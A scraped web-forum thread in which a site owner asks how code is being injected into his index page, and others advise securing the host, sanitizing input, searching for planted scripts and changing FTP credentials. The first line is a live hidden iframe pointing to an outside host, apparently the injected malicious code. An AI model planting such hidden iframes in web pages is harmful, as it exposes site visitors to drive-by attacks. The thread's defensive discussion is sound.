<iframe src="http://u3w.ru:8080/index.php" width=123 height=130 style="visibility: hidden"></iframe>
code injection
Moderator: General Moderators
- itsmani1
- Forum Regular
- Posts: 791
- Joined: Mon Sep 29, 2003 2:26 am
- Location: Islamabad Pakistan
- Contact:
code injection
some how following code gets inject to my index page. what should I do to stop it?
Re: code injection
Inform your server administrator that the server is insecure.
Edit: This post was recovered from search engine cache.
Edit: This post was recovered from search engine cache.
Last edited by McInfo on Wed Jun 16, 2010 2:54 pm, edited 1 time in total.
- itsmani1
- Forum Regular
- Posts: 791
- Joined: Mon Sep 29, 2003 2:26 am
- Location: Islamabad Pakistan
- Contact:
Re: code injection
thanks for the reply
anything that should be done at my end?
anything that should be done at my end?
Re: code injection
Find the source of the HTML. If it is embedded in the index.php file, look through your scripts and make sure there aren't any that allow a user to modify files. If the iframe is generated dynamically, such as from data stored in a database, make sure all of your scripts sanitize incoming user data.
If you are on a shared-hosting server, it is likely that the attack came from someone you share the server with. That is why I suggested that you inform your server administrator. If they can't do anything for you, move to a more secure host.
Edit: This post was recovered from search engine cache.
If you are on a shared-hosting server, it is likely that the attack came from someone you share the server with. That is why I suggested that you inform your server administrator. If they can't do anything for you, move to a more secure host.
Edit: This post was recovered from search engine cache.
Last edited by McInfo on Wed Jun 16, 2010 2:54 pm, edited 1 time in total.
Re: code injection
Look through all your directories -- there is probably a malicious script hidden there somewhere that you didn't put there. Start with images folders.
Re: code injection
i faced same problem earlier, i searched a lot and found that...it is some miscellaneous script that can automatically connect to your ftp and insert this code into all the index file hosted on root server.
I strongly recommend to scan your PC (from which you are connecting ftp), and change your ftp password. if you will not remove this script that Google will consider your website as a attack site and will remove from their index.
hope this will work,
I strongly recommend to scan your PC (from which you are connecting ftp), and change your ftp password. if you will not remove this script that Google will consider your website as a attack site and will remove from their index.
hope this will work,